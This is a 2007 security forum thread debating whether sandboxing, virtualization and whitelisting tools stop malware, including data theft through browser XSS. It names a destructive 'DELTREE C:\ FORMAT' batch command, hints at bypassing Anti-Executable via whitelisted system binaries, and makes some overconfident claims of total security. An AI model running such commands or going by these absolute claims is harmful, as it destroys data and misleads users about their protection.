Virtualization question.
ErikAlbert
May 12th, 2007, 04:05 AM
AFAIK the principle of sandboxing and virtualization (Sandboxie, PowerShadow, ...) is to ISOLATE infections, so that they cannot install themselves on your real harddisk.
So these security softwares keep your harddisk clean, because they prevent installation and this is the best kind of protection, because if an infection installs itself, you have a much bigger problem, you have to detect and remove it in time, before it can execute its evil job.
Although the infections are isolated, my question is still, can these infections still do their evil job or NOT ?
Isolation is nice, but only nice when the execution is also impossible. :)
Huupi
May 12th, 2007, 04:31 AM
-{ Quote: "AFAIK the principle of sandboxing and virtualization (Sandboxie, PowerShadow, ...) is to ISOLATE infections, so that they cannot install themselves on your real harddisk.
So these security softwares keep your harddisk clean, because they prevent installation and this is the best kind of protection, because if an infection installs itself, you have a much bigger problem, you have to detect and remove it in time, before it can execute its evil job.
Although the infections are isolated, my question is still, can these infections still do their evil job or NOT ?
Isolation is nice, but only nice when the execution is also impossible. :)" }-
Have no illusions about that, we live in the world of anti/anti/anti/anti missiles so to speak, and one day everything gets hosed; it's the game of bad smart guys against good smart guys, and there is no winner!!
ErikAlbert
May 12th, 2007, 04:44 AM
-{ Quote: "Have no illusions about that, we live in the world of anti/anti/anti/anti missiles so to speak, and one day everything gets hosed; it's the game of bad smart guys against good smart guys, and there is no winner!!" }-
In other words these softwares don't do a full job and can't be trusted either. That's what I thought too, not only regarding virtualization, but also the rest of security softwares.
That's why I replace my system partition with a new one during each reboot, because I can't depend on security softwares, too many holes.
EASTER.2010
May 12th, 2007, 05:02 AM
-{ Quote: "Have no illusions about that, we live in the world of anti/anti/anti/anti missiles so to speak, and one day everything gets hosed; it's the game of bad smart guys against good smart guys, and there is no winner!!" }-
Again I beg to differ with a defeatist attitude. Yes, many will say it's fact and only a matter of time, but they have been completely absent from the scene of security meetings such as these longer than most to subscribe to such a notion.
If the facts truly be known, the WINNER!! as they say is really YOU! or US!
"IF" you have ALL the right pieces (programs) in place AND/OR duplicates of your system/drive onto METAL HDs... you've already 100% completely and without remedy defeated the best efforts/purposes of even the cleverest/sharpest Windows coder of intrusion or distraction programs on the face of the earth.
I've said it many times before and will say again for clarity right here and now. Up until that very day that some exploit developer or team of them can ever effectively hijack the very electric current that flows into these electronics reaching our computer machines, their efforts are limited at best to only the uninformed and unlearned user/business.
There's really no illusion to this at all, nor wishful thinking; it only takes a sincerely determined and concerted effort on the well-informed end user's part to totally secure their data AND machine from ever being compromised, aside from it being physically removed from its premises. All too simple.
Huupi
May 12th, 2007, 05:38 AM
-{ Quote: "Again I beg to differ with a defeatist attitude. Yes, many will say it's fact and only a matter of time, but they have been completely absent from the scene of security meetings such as these longer than most to subscribe to such a notion.
If the facts truly be known, the WINNER!! as they say is really YOU! or US!
"IF" you have ALL the right pieces (programs) in place AND/OR duplicates of your system/drive onto METAL HDs... you've already 100% completely and without remedy defeated the best efforts/purposes of even the cleverest/sharpest Windows coder of intrusion or distraction programs on the face of the earth.
I've said it many times before and will say again for clarity right here and now. Up until that very day that some exploit developer or team of them can ever effectively hijack the very electric current that flows into these electronics reaching our computer machines, their efforts are limited at best to only the uninformed and unlearned user/business.
There's really no illusion to this at all, nor wishful thinking; it only takes a sincerely determined and concerted effort on the well-informed end user's part to totally secure their data AND machine from ever being compromised, aside from it being physically removed from its premises. All too simple." }-
Hey Easter 2010, as an example: you place great confidence in PowerShadow, and one of the clever coders abandons the company and joins the ranks of the bad guys; he knows exactly how to compromise the stuff, and in no time your blessed virtualization is not virtual at all. Don't forget it's all about money, no ethics involved; we live in a greedy world, so the cyberworld is no exception!!
ErikAlbert
May 12th, 2007, 05:43 AM
Well, I still don't have a straight answer to my question.
Is an isolated infection able to do its evil job or not, in case the virtualization software isn't compromised yet ?
I don't see the installation as a problem, because I can remove the installation. So that problem is already taken care of.
I see the execution as a serious problem, because once it's done, I can't undo the execution.
farmerlee
May 12th, 2007, 06:02 AM
If there is no other protection in place, malware can do whatever it's programmed to do once executed in a virtual environment.
EASTER.2010
May 12th, 2007, 06:04 AM
-{ Quote: "Hey Easter 2010, as an example: you place great confidence in PowerShadow, and one of the clever coders abandons the company and joins the ranks of the bad guys; he knows exactly how to compromise the stuff, and in no time your blessed virtualization is not virtual at all. Don't forget it's all about money, no ethics involved; we live in a greedy world, so the cyberworld is no exception!!" }-
Hey Huupi, no matter at all. Power Shadow is but a single program and if you read these forums regularly you should know by now EVERYONE uses a Layered Approach anyway. It's the safest way to go don't ya' know.
Besides, I've got FD-ISR snapshots plus a Library of ARCHIVES, so what?
And even then, I keep "Perfectly Clean & Intact" IMAGES of my entire drives/partition stored in my closet. ;D
So no matter, and POWER SHADOW still works PERFECT!
There is then now & therefore no more fear EVER of contempt or compromise to my system, ;D either forced attempts from outside interests or self inflicted because FirstDefense keeps my archives in the exact order as when they were created. ;D
IF I ever need to return my active system to some prior state, it's accomplished in record time, as in seconds!!
ErikAlbert
May 12th, 2007, 06:11 AM
Please no discussion about compromised security softwares; ALL security softwares can be compromised without exception and it has been proven. Image backup solves such a problem, and the owner of the software will fix it too.
That's why Windows and other softwares have so many patches. :)
ErikAlbert
May 12th, 2007, 06:18 AM
-{ Quote: "If there is no other protection in place, malware can do whatever it's programmed to do once executed in a virtual environment." }-
Finally one answer. Thanks for your opinion. I still think that Anti-Executable and DefenseWall do a better job than virtualization softwares, because they stop the execution.
solcroft
May 12th, 2007, 06:27 AM
-{ Quote: "AFAIK the principle of sandboxing and virtualization (Sandboxie, PowerShadow, ...) is to ISOLATE infections, so that they cannot install themselves on your real harddisk.
So these security softwares keep your harddisk clean, because they prevent installation and this is the best kind of protection, because if an infection installs itself, you have a much bigger problem, you have to detect and remove it in time, before it can execute its evil job.
Although the infections are isolated, my question is still, can these infections still do their evil job or NOT ?
Isolation is nice, but only nice when the execution is also impossible. :)" }-
The infections can still execute and deliver their payload, but their effects are limited to the virtualized environment. If malware executes inside a sandbox quarantined by SandboxIE, the effects will be gone when you delete the sandbox. If malware executes when you are in Shadow Mode using PowerShadow, whatever the malware does will be reversed after a reboot. In no way, barring bugs in the virtualization software, will malware be able to effect any changes outside the virtualized environment.
ErikAlbert
May 12th, 2007, 06:34 AM
-{ Quote: "The infections can still execute and deliver their payload, but their effects are limited to the virtualized environment. If malware executes inside a sandbox quarantined by SandboxIE, the effects will be gone when you delete the sandbox. If malware executes when you are in Shadow Mode using PowerShadow, whatever the malware does will be reversed after a reboot. In no way, barring bugs in the virtualization software, will malware be able to effect any changes outside the virtualized environment." }-
Is an isolated malware able to send info to the thief over the internet ?
EASTER.2010
May 12th, 2007, 06:40 AM
-{ Quote: "I still think that Anti-Executable and DefenseWall do a better job than virtualization softwares, because they stop the execution." }-
Good point Erik because whatever material (files/programs) are prevented from "FULL" entry in the first place the same has nowhere to lodge let alone communicate with your ($M's buggy) system, which enforces my support of HIPS all the more because they COMPLETELY SUSPEND! interaction before any damage or change can even happen.
Something To Note:
This regards executables alone no matter the file extension $M designed in them to double the same as an executable file, any of them. Because whatever we view on the screen absolutely MUST enter our file system (Temporary Internet Files) or there would be nothing to see or read.
ErikAlbert
May 12th, 2007, 07:01 AM
-{ Quote: "which enforces my support of HIPS all the more because they COMPLETELY SUSPEND! interaction before any damage or change can even happen." }-
On condition that users know how to make decisions in HIPS, which is a problem for most average users.
-{ Quote: "Something To Note:
This regards executables alone no matter the file extension $M designed in them to double the same as an executable file, any of them. Because whatever we view on the screen absolutely MUST enter our file system (Temporary Internet Files) or there would be nothing to see or read." }-
I can't translate this very well in Dutch. So I don't really understand this.
farmerlee
May 12th, 2007, 07:15 AM
-{ Quote: "Is an isolated malware able to send info to the thief over the internet ?" }-
If not intercepted by a firewall then malware can send whatever to wherever.
IMO sandboxing's main use is to isolate any possible infections. Virtualization's main use is to allow the user to do whatever they like without fear of corrupting their working base system.
solcroft
May 12th, 2007, 07:17 AM
-{ Quote: "Is an isolated malware able to send info to the thief over the internet ?" }-
Unfortunately, yes. This is one point where virtualization will fail you, because they only stop changes from being done to the local computer.
Franklin
May 12th, 2007, 07:21 AM
Wouldn't your firewall throw up an outbound alert?
How long before a suit offers AV, AS, FW, HIPS and virtualization?
EASTER.2010
May 12th, 2007, 07:22 AM
True and true again as both replied above.
Virtualizing is more adept to FLUSHING like you do your toilet after use. Simple analogy but you get the point.
That's the reason for "resident" antispyware & antivirus programs etc. They work to identify (if they can) something registered as malicious and potentially harmful.
Kees1958
May 12th, 2007, 07:22 AM
Hi ErikAlbert,
I will have a go to translate this for you:
Something To Note:
This regards executables alone no matter the file extension $M designed in them to double the same as an executable file, any of them. Because whatever we view on the screen absolutely MUST enter our file system (Temporary Internet Files) or there would be nothing to see or read.
It is good to take the same double precautions for every executable file (no matter which extension Microsoft has given it). I think "double" refers to Anti-Executable + DefenseWall (that is, only letting a program start after explicit confirmation by the user, with limited rights for files that come from untrusted sources).
Finally, everything we see on our screen is first put on our computer (for example the Temporary Internet Files) or loaded (into memory).
Regards, Kees
Infinity
May 12th, 2007, 07:23 AM
-{ Quote: "Is an isolated malware able to send info to the thief over the internet ?" }-
that's one of the main reasons, Erik, that I still depend on scanners (AV/AT/AS), because between reboots malware can do its tricks ... (the way you have your setup I mean) ...
I guess the main reason for stopping this is having Anti-Executable? Am I right?
but there is far more nasty out there than *.exe, ...
that's why your setup has a serious vulnerability imho ...
But I have no illusions about mine either ... mine is filled with holes as big as XP and Vista ;) ...
solcroft
May 12th, 2007, 07:37 AM
-{ Quote: "that's one of the main reasons, Erik, that I still depend on scanners (AV/AT/AS), because between reboots malware can do its tricks ... (the way you have your setup I mean) ...
I guess the main reason for stopping this is having Anti-Executable? Am I right?
but there is far more nasty out there than *.exe, ...
that's why your setup has a serious vulnerability imho ...
But I have no illusions about mine either ... mine is filled with holes as big as XP and Vista ;) ..." }-
As far as I can tell, Anti-Executable stops more than .exe files. However, I have no idea if it only looks at the extension or checks the mimetype as well - if it's the former, I can certainly think of a way or two to possibly get past it...
If used in tandem with virtualization software or a good HIPS, a firewall will eliminate the need for things such as scanners or Anti-Executable. A good firewall should always be part of your security setup anyway.
ErikAlbert
May 12th, 2007, 08:00 AM
-{ Quote: "As far as I can tell, Anti-Executable stops more than .exe files. However, I have no idea if it only looks at the extension or checks the mimetype as well - if it's the former, I can certainly think of a way or two to possibly get past it...
If used in tandem with virtualization software or a good HIPS, a firewall will eliminate the need for things such as scanners or Anti-Executable. A good firewall should always be part of your security setup anyway." }-
Anti-Executable recognizes more than 80 executables, and each executable has a quintuple verification: File Size, File Type, File Location, Creation Date and Code Sample.
That's a pretty strong protection to stop installation and execution of malicious executables. Anything that doesn't fit is simply refused by Anti-Executable.
Infinity
May 12th, 2007, 08:04 AM
-{ Quote: "As far as I can tell, Anti-Executable stops more than .exe files. However, I have no idea if it only looks at the extension or checks the mimetype as well - if it's the former, I can certainly think of a way or two to possibly get past it..." }-
indeed, that's what I was thinking too.
it's like you said ... a firewall should stop (and LnS does) / fix a lot of nasty stuff.
take care,
ErikAlbert
May 12th, 2007, 08:04 AM
-{ Quote: "that's one of the main reasons, Erik, that I still depend on scanners (AV/AT/AS), because between reboots malware can do its tricks ... (the way you have your setup I mean) ..." }-
Well, I have a problem with trusting scanners, but I guess you must know this already. My security is mainly based on whitelists and stopping execution. After reboot I have my unchanged system partition back anyway.
ErikAlbert
May 12th, 2007, 08:09 AM
-{ Quote: "Hi ErikAlbert,
It is good to take the same double precautions for every executable file (no matter which extension Microsoft has given it). I think "double" refers to Anti-Executable + DefenseWall (that is, only letting a program start after explicit confirmation by the user, with limited rights for files that come from untrusted sources).
Finally, everything we see on our screen is first put on our computer (for example the Temporary Internet Files) or loaded (into memory).
Regards, Kees" }-
Thanks a lot, Kees. 8)
solcroft
May 12th, 2007, 08:13 AM
-{ Quote: "Anti-Executable recognizes more than 80 executables, and each executable has a quintuple verification: File Size, File Type, File Location, Creation Date and Code Sample.
That's a pretty strong protection to stop installation and execution of malicious executables. Anything that doesn't fit is simply refused by Anti-Executable." }-
Depends. If it doesn't check mimetypes, and if it whitelists rundll32.exe or cmd.exe by default, then everything's game.
Though I personally doubt that. ;D
EASTER.2010
May 12th, 2007, 08:16 AM
Someone recently took me to task over my choice and recommending ScriptSentry, but right there, and possibly most of all, has been the perfect launching/spreading method of viruses for a long time on Windows systems.
Vbs files, batch, and other files that use $M's scripting host have been responsible for plenty of malicious and damaging actions carried out either remotely or from an email link ETC., and they still can be used exactly the same as an .exe. I use them all the time to automate different purposes on my machine, since you can even set a schedule for when they're due to activate.
ScriptSentry always worked just like a HIPS in that it associates itself "FIRST!" with those executable file extensions and stops them cold before they can take off and do any damage.
Pedro
May 12th, 2007, 08:19 AM
SandboxIE, you set it to block read of important folders. Those folders will not be read by anything sandboxed. Rootkits will not be installed. Only the lightweight keyloggers (Tzuk has a name for those, "Windows Message Key-Loggers"; "Typically this key-logger will be a secret Web browser plugin").
Put it this way: I'm pretty sure malware doesn't do anything. With VMs, it's even more extreme, since whatever malware exists in the VM already thinks it's riding one computer, not two.
ErikAlbert
May 12th, 2007, 08:28 AM
-{ Quote: "Depends. If it doesn't check mimetypes, and if it whitelists rundll32.exe or cmd.exe by default, then everything's game.
Though I personally doubt that. ;D" }-
Well, I still have my reboot that replaces my system partition completely with a new one, because I don't trust any of my security softwares.
flinchlock
May 12th, 2007, 09:24 AM
-{ Quote: "ALL security softwares can be compromised without exception and it has been proven." }-
Correction... "ALL security softwares can be compromised without exception and it has been proven."
How can you be 100% sure the software you use for your off-line snap is 100% good... do you always buy CDs, and never download from the Internet?
To me, there is no such thing as "security software", the software is either good or bad/flawed. "Security software" gives a false sense of real security.
Mike
ErikAlbert
May 12th, 2007, 09:54 AM
-{ Quote: "Correction... "ALL security softwares can be compromised without exception and it has been proven."
How can you be 100% sure the software you use for your off-line snap is 100% good... do you always buy CDs, and never download from the Internet?
To me, there is no such thing as "security software", the software is either good or bad/flawed. "Security software" gives a false sense of real security.
Mike" }-
I'm never sure about anything in life, but I like to get close to the best solution I can get. Everybody has downloaded software; I'm no exception.
I prefer to use whitelists rather than blacklists to keep my computer clean, which is a lot better and more reassuring than the scanner message "Congrats, no malware found."
Keep your scanners, I have something much better. :)
Rmus
May 12th, 2007, 10:04 AM
-{ Quote: "Is an isolated malware able to send info to the thief over the internet ?" }-
-{ Quote: "ScriptSentry always worked just like a HIPS in that it associates itself "FIRST!" with those executable file extensions and stops them cold before they can take off and do any damage." }-
Hello Erik and Easter,
Unfortunately, programs like ScriptSentry must read the file from disk, and are no protection against scripts on a web site that are interpreted by the browser - javascript being the main culprit.
This is true of XSS attacks which use javascript, where even in a virtualized environment, info can indeed be sent to the thief over the internet.
The problem is that most secure sites require javascript to be enabled.
See here (http://www.wilderssecurity.com/showthread.php?t=174415) for an example, and feel free to suggest preventative measures.
regards,
-rich
________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier
Pedro
May 12th, 2007, 10:07 AM
I guess malware is also XSS attacks; they are scripts. Sorry for not including a current threat.
EASTER.2010
May 12th, 2007, 01:49 PM
-{ Quote: "Unfortunately, programs like ScriptSentry must read the file from disk, and are no protection against scripts on a web site that are interpreted by the browser - javascript being the main culprit." }-
Worth pointing out and of course true.
From that viewpoint, I'm not sure if an argument for Opera or Mozilla etc. would be of any real benefit, but it's little consolation for the masses who depend solely on the IE browser now, is it?
ErikAlbert
May 12th, 2007, 01:51 PM
What does a script do to your system partition ?
EASTER.2010
May 12th, 2007, 01:58 PM
-{ Quote: "What does a script do to your system partition ?" }-
If your script-blocking software supports it, NOTHING AT ALL.
ErikAlbert
May 12th, 2007, 02:15 PM
-{ Quote: "If your script-blocking software supports it, NOTHING AT ALL." }-
That wasn't my question.
EASTER.2010
May 12th, 2007, 02:34 PM
Sorry i don't know Dutch, i didn't completely understand what answer you're looking for.
Horus37
May 12th, 2007, 02:35 PM
That's why I usually run with JavaScript turned off if I can get away with it. However, what about the code that can flash your BIOS? Does it need a reboot to do so? What about updating firmware with code? For those things that may be stuck on my computer during a reboot I have Avast Antivirus, as it has a pre-boot AV scanner that scans the whole system the way I tell it to, to block code from infecting during a boot-up. Avast also has a built-in anti-executable feature that you can program with many various types of extensions. Comodo has a feature on its firewall to prevent outgoing signals during a boot-up process as well. My main concern is the booting process, so I want my nasties GONE before I have to boot. That is why I chose PowerShadow. FDISR's frozen snapshot ends up trying to erase something AFTER the boot. You can't erase a BIOS flash.
Rmus
May 12th, 2007, 03:33 PM
-{ Quote: "What does a script do to your system partition ?" }-
What a script does on the HD is of no consequence if you have a reboot-to-restore solution.
But the point I was making referred to your question about sending info out during the session. These kinds of attacks are not interested in changing anything on your partition, rather, stealing data during the session, prior to your reboot.
This is in answer to the topic of your thread:
-{ Quote: "Although the infections are isolated, my question is still, can these infections still do their evil job or NOT ?
Isolation is nice, but only nice when the execution is also impossible." }-
If you consider an XSS attack as an "infection" - temporary for sure, then the answer is Yes.
Whether or not you are in a virtualized environment doesn't matter, as long as the browser has free access in<--->out on the internet.
@ Easter: It doesn't matter which browser. If javascript is enabled because the site needs it, the script gets interpreted.
To understand how this works, see the XSS threads in the 'Other Security Topics' forum.
regards,
-rich
EASTER.2010
May 12th, 2007, 03:45 PM
-{ Quote: "@ Easter: It doesn't matter which browser. If javascript is enabled because the site needs it, the script gets interpreted.
To understand how this works, see the XSS threads in the 'Other Security Topics' forum.
regards,
-rich" }-
Thanks for those details and explanations. I think every $M O/S should have some form of script-blocking security in place for the just-in-case scenario.
BTW, just speculating with this, but I think the term scripting here has to do with the fact that ALL scripts are basic TEXT files incognito. Correct me if this is not accurate; I tend to not enjoy putting my foot in my mouth too often where it concerns $M's style of different coding techniques. LoL
lucas1985
May 12th, 2007, 04:00 PM
-{ Quote: "If it doesn't check mimetypes, and if it whitelists rundll32.exe or cmd.exe by default, then everything's game." }-
I suggest you to read Rmus' analysis of Anti-Executable (http://www.urs2.net/rsj/computing/tests/Anti-Exec/index.html). Yes, AE whitelists rundll32.exe and cmd.exe and I see this as a possible hole. But, I'm not smart enough to figure a way to pass commands to those files without running another executable which isn't allowed by AE.
-{ Quote: "What does a script do to your system partition ?" }-
A script can do whatever it wants (i.e., wipe your hard disk). However, scripts are treated as executable by Anti-Executable, so they aren't a problem for you.
Answering your original question: virtualization/sandboxes don't protect against keyloggers/password stealers. But there are solutions to this issue:
- Encrypt your critical/sensitive information/files.
- Make a rule in the sandbox (GeSWall, Sandboxie and Defensewall all support confidential folders) to prevent disclosure of files/folders containing sensitive information.
- Harden the security of the browser (NoScript, whitelist cookies, control of referers, firewall rule for HTTPS traffic, etc) to prevent in-browser threats (XSS, spoofing, etc)
ErikAlbert
May 12th, 2007, 04:16 PM
-{ Quote: "I suggest you to read Rmus' analysis of Anti-Executable (http://www.urs2.net/rsj/computing/tests/Anti-Exec/index.html). Yes, AE whitelists rundll32.exe and cmd.exe and I see this as a possible hole. But, I'm not smart enough to figure a way to pass commands to those files without running another executable which isn't allowed by AE.
A script can do whatever it wants (i.e., wipe your hard disk). However, scripts are treated as executable by Anti-Executable, so they aren't a problem for you.
Answering your original question: virtualization/sandboxes don't protect against keyloggers/password stealers. But there are solutions to this issue:
- Encrypt your critical/sensitive information/files.
- Make a rule in the sandbox (GeSWall, Sandboxie and Defensewall all support confidential folders) to prevent disclosure of files/folders containing sensitive information.
- Harden the security of the browser (NoScript, whitelist cookies, control of referers, firewall rule for HTTPS traffic, etc) to prevent in-browser threats (XSS, spoofing, etc)" }-
Thank you guys. It seems to me that AE isn't such a bad choice after all.
My main goal is stopping the execution of infections, which is the worst part of any infection.
DefenseWall treats Firefox and MSIE as untrusted applications, which means they can't do much either.
Emails aren't a problem, I ignore and delete them without opening them.
Kees1958
May 12th, 2007, 04:20 PM
-{ Quote: "Well, I still have my reboot that replaces my system partition completely with a new one, because I don't trust any of my security softwares." }-
Just add scriptsentry or scriptdefender. Next add the one of your choice to the untrusted programs within DefenseWall. Now all scripts are marked untrusted and limited in rights. Maybe this helps you to gain trust (at least in your rock solid defense combo) and get connected (for instance by e-mail) in the digital world.
Regards K
lucas1985
May 12th, 2007, 04:32 PM
-{ Quote: "DefenseWall treats Firefox and MSIE as untrusted applications, which means they can't do much either." }-
Untrusted means that a file downloaded/created by FF/MSIE can't modify system settings, write to the registry, install drivers/hooks/services, read/write from/to physical memory, etc.
You're still exposed to browser-based scripting attacks. Anti-Executable only protects you against WSH-based (http://en.wikipedia.org/wiki/Windows_Script_Host) scripts.
As a general rule, when you're going to do bank transactions/online shopping, start a new/fresh browser session.
Kees1958
May 12th, 2007, 04:33 PM
-{ Quote: "Hello Erik and Easter,
Unfortunately, programs like ScriptSentry must read the file from disk, and are no protection against scripts on a web site that are interpreted by the browser - javascript being the main culprit.
This is true of XSS attacks which use javascript, where even in a virtualized environment, info can indeed be sent to the thief over the internet.
The problem is that most secure sites require javascript to be enabled.
See here (http://www.wilderssecurity.com/showthread.php?t=174415) for an example, and feel free to suggest preventative measures.
regards,
-rich
" }-
When using a policy right virtualization program like GeSwall or Defense Wall, just quit all untrusted processes first before starting sensitive internet sessions (like Lucas1985 advised).
This is more or less a workaround, not a direct countermeasure.
Regards K
ErikAlbert
May 12th, 2007, 04:41 PM
-{ Quote: "You're still exposed to browser-based scripting attacks." }-
Even when Java and JavaScript are disabled in Firefox?
solcroft
May 12th, 2007, 04:50 PM
-{ Quote: "I suggest you to read Rmus' analysis of Anti-Executable (http://www.urs2.net/rsj/computing/tests/Anti-Exec/index.html). Yes, AE whitelists rundll32.exe and cmd.exe and I see this as a possible hole. But, I'm not smart enough to figure a way to pass commands to those files without running another executable which isn't allowed by AE." }-
After reading that article, I actually think I'm already halfway to bypassing AE. Unless something I suspect and the article doesn't describe is false. ;D
Rmus
May 12th, 2007, 04:58 PM
-{ Quote: "Thanks for those details and explanations. I think every $M O/S should have some form of script-blocking security in place for the just-in-case scenario." }-
This, of course, is an immense problem: in the case of web-embedded javascript - that is, code in the HTML source code of the web page - how do you determine good from bad? Anti-virus solutions for recognizing "bad code" in the case of that used in cross site scripting (XSS) have not proven reliable, since the code can be easily modified.
-{ Quote: "BTW, just speculating with this but i think the term scripting here has to do with that ALL scripts are basic TEXT files incognito" }-Yes, for example, as soon as the HTML page for any web site caches to your HD, it essentially is a text (non-formatted) file. When you go to View|Source in your browser, you are opening the web page in a text editor and you will see that it is a plain text file.
Do this experiment: clear your browser cache, then go to a web site and observe what caches. I'll do this now using IE to cache Wilders (IE is nice because it retains the original file names) - see screenshot
If these files weren't cached, you could not see anything on your monitor.
Now, why didn't your ScriptSentry keep those .js files from running? Because the browser interprets them: they are not "executed" on the HD like a normal file would be.
You can configure the browser to not run them, of course, but the problem is some sites (including Wilders) require javascript for certain functions to run. We trust Wilders not to run malicious scripts, so we don't worry about it.
Now, double-click-to-run one of the .js files and your ScriptSentry will intercept it because Windows, rather than the browser, interprets the .js file extension and sends it to ScriptSentry according to the HKCR command in the Registry for the .js filetype:
[HKEY_CLASSES_ROOT\JSFile\Shell\Open\Command]
@="C:\\Program Files\\Script Sentry\\ScriptSentry.exe \"%1\" %*"
Understanding the difference in how file extensions are interpreted - whether by the browser or the OS - is imperative in order to understand what security solutions are necessary in each case. For example, you may not want a .pdf file on the web to open in the browser; so, you can configure the browser to pass the .pdf file extension directly to the OS to open in your default Reader program, thus preventing the appended-URL exploit from a while back. You can configure the browser to pass web-based *.doc files to a text editor, rather than to MSWord, for obvious reasons.
Now, open-to-edit the .js file in a text editor and you will see that it is a plain text file.
As an aside, one of the most innovative programs I've ever seen is WormGuard. Rather than associate all script extensions to block, as is the method with ScriptSentry and similar, it analyzes the scripts with several different types of "engines" and alerts when it recognizes malicious code in the script.
This approach eventually may be a solution that can be used to analyze (scan) web-based scripts.
regards,
-rich
________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier
lucas1985
May 12th, 2007, 05:00 PM
-{ Quote: "Even when Java and JavaScript is disabled in Firefox ?" }-
Completely disabled or using a whitelist like NoScript?
-{ Quote: "After reading that article, I actually think I'm already halfway to bypassing AE. Unless something I suspect and the article doesn't describe is false. ;D" }-
Please, share with us your findings/thoughts.
-{ Quote: "As an aside, one of the most innovative programs I've ever seen is WormGuard. Rather than associate all script extensions to block, as is the method with ScriptSentry and similar, it analyzes the scripts with several different types of "engines" and alerts when it recognizes malicious code in the script.
This approach eventually may be a solution that can be used to analyze (scan) web-based scripts." }-
Does WormGuard analyze browser-based scripts? :o :o I've learned something new. However, WG's solution is behavioral/heuristic based, so it may fail (unlike whitelists).
Rmus
May 12th, 2007, 05:15 PM
-{ Quote: "However, scripts are treated as executable by Anti-Executable, so they aren't a problem for you." }--{ Quote: " Anti-Executable only protects you against WSH-based (http://en.wikipedia.org/wiki/Windows_Script_Host) scripts." }-There is a slight misconception here.
Both file extensions .exe and .vbs are "executable" in that they run code. However, for convenience, a distinction is made between .exe (executable) and .vbs (script).
Anti-Executable does not protect against script-types: .js, .vbs, etc.
Anti-Executable's job is to create a White List of all .exe-type executable file types: .exe, .dll, .sys, .ocx, etc. Any file of this executable type will not be allowed to download/install/run if not on the White List.
Script-type executables must be dealt with according to whether the file (using .js is an example) is already on the HD and attempts to execute by some means; or, embedded in a web page, as I've described above.
Lucas, WormGuard does not analyze web-based scripts. I suggested that its approach might be integrated with some type of web-scanning solution. We'll have to see :)
regards,
-rich
Rmus
May 12th, 2007, 05:22 PM
-{ Quote: "As a general rule, when you're going to do bank transactions/online shopping, start a new/fresh browser session." }-Please read the XSS threads in the other security forum. This is a completely different problem, and none of the solutions discussed here in this thread will work.
So, go over there and have a look and give it some thought, because it requires a totally different approach and analysis.
regards,
-rich
lucas1985
May 12th, 2007, 05:29 PM
-{ Quote: "
Both file extensions .exe and .vbs are "executable" in that they run code. However, for convenience, a distinction is made between .exe (executable) and .vbs (script)." }-
I know that ;) I just didn't want to explode Erik's head ;D
-{ Quote: "Anti-Executable does not protect against script-types: .js, .vbs, etc.
Anti-Executable's job is to create a White List of all .exe-type executable file types: .exe, .dll, .sys, .ocx, etc. Any file of this executable type will not be allowed to download/install/run if not on the White List.." }-
Well, I'm confused now :blink: I thought that AE intercepts WSH scripts. So, ScriptDefender/ScriptSentry aren't redundant add-ons to AE.
-{ Quote: "Lucas, WormGuard does not analyze web-based scripts. I suggested that it's approach might be integrated with some type of web-scanning solution. We'll have to see :) " }-
Have you tested WG against malware/PoC?
:thumb:
Rmus
May 12th, 2007, 05:29 PM
-{ Quote: " Yes, AE whitelists rundll32.exe and cmd.exe and I see this as a possible hole. " }-Only if a malicious program is either already installed before you let AE create the White List, or if it installed while you had AE disabled. In both cases, the malicious program could use those two you mention to carry out attacks.
AE is not a behavior blocker. It has one simple function: while enabled, to guard the door against any executable not on its White List;
regards,
-rich
EASTER.2010
May 12th, 2007, 05:33 PM
Strange but still disturbing fact nonetheless that you bring up here, but not so long as you apply script security which acts as a go-between for .vbs, .bat, .js, .reg and so forth with script extensions.
These potentially dangerous files can be easily overlooked and in many instances have been discounted in the past AND present, but nothing is more threatening to a system than these scripts can be.
I once clicked a single .bat file purely by accident that was so coded that when I hit the shut-off button to stop it, I thought I had prevented a catastrophe, since it was a HardDrive Killer program I got off a virus site. Unbeknownst to me until I actually read the code later, the worst thing I did was reboot, because it proceeded to complete the DELTREE C:\ FORMAT job completely and quickly :blink:
Rmus
May 12th, 2007, 05:34 PM
-{ Quote: "Well, I'm confused now :blink: I thought that AE intercepts WSH scripts. So, ScriptDefender/ScriptSentry aren't redundant add-ons to AE." }-No, not at all.
-{ Quote: "Have you tested WG against malware/PoC?" }-See here:
http://www.wilderssecurity.com/showpost.php?p=521885&postcount=7
regards,
-rich
lucas1985
May 12th, 2007, 05:36 PM
-{ Quote: "Please read the XSS threads in the other security forum. This is a completely different problem, and none of the solutions discussed here in this thread will work." }-
Please, read this post (http://www.wilderssecurity.com/showpost.php?p=1002556&postcount=42):
-{ Quote: "Virtualization/sandboxes doesn't protect against keyloggers/password stealers. But, there are solutions to this issue:
Against keyloggers. Keylogger executes inside the sandbox but it can't grab data
- Encrypt your critical/sensitive information/files.
- Make a rule in the sandbox (GeSWall, Sandboxie and Defensewall all support confidential folders) to prevent disclosure of files/folders containing sensitive information.
Against XSS
- Harden the security of the browser (NoScript, firewall rule for HTTPS traffic, etc) to prevent in-browser threats (XSS, spoofing, etc)" }-
-{ Quote: "
See here:
http://www.wilderssecurity.com/showpost.php?p=521885&postcount=7" }-
Thanks ;)
Unfortunately, DiamondCS seems to be in the twilight.
Rmus
May 12th, 2007, 05:52 PM
-{ Quote: "Please, read this post (http://www.wilderssecurity.com/showpost.php?p=1002556&postcount=42):" }-I'm not sure what your point is.
In the XSS exploit, where the login page has been compromised, the user enters her/his ID and Password to log in to the page. When the user clicks "Submit" that information is sent out to the hacker.
Nothing discussed here will prevent that.
If you have a solution, please go to my XSS thread and present it :)
regards,
-rich
Rmus
May 12th, 2007, 05:57 PM
Here is a good example of the problem with web-embedded scripts.
I can click elio's link in the ZA XSS thread to open his XSS exploit demo page, and the browser happily obliges.
However, if I d-click the cached .html file, WormGuard snags it because it has been able to read the file from disk:
http://www.urs2.net/rsj/computing/imgs/wg-example.gif
The file with a questionable script has to be already on the HD for a script-blocking program to work.
regards,
-rich
lucas1985
May 12th, 2007, 05:59 PM
-{ Quote: "I'm not sure what your point is." }-
I'm suggesting that against browser-based attacks, the countermeasures are:
- NoScript (anti-XSS features).
- Whitelisted HTTP/S traffic (your approach).
-{ Quote: "The file with a questionable script has to be already on the HD for a script-blocking program to work." }-
You're right. A possible solution would be integrating WG's engine into a browser plug-in. Firekeeper (http://firekeeper.mozdev.org/index.html) could be that solution.
Rmus
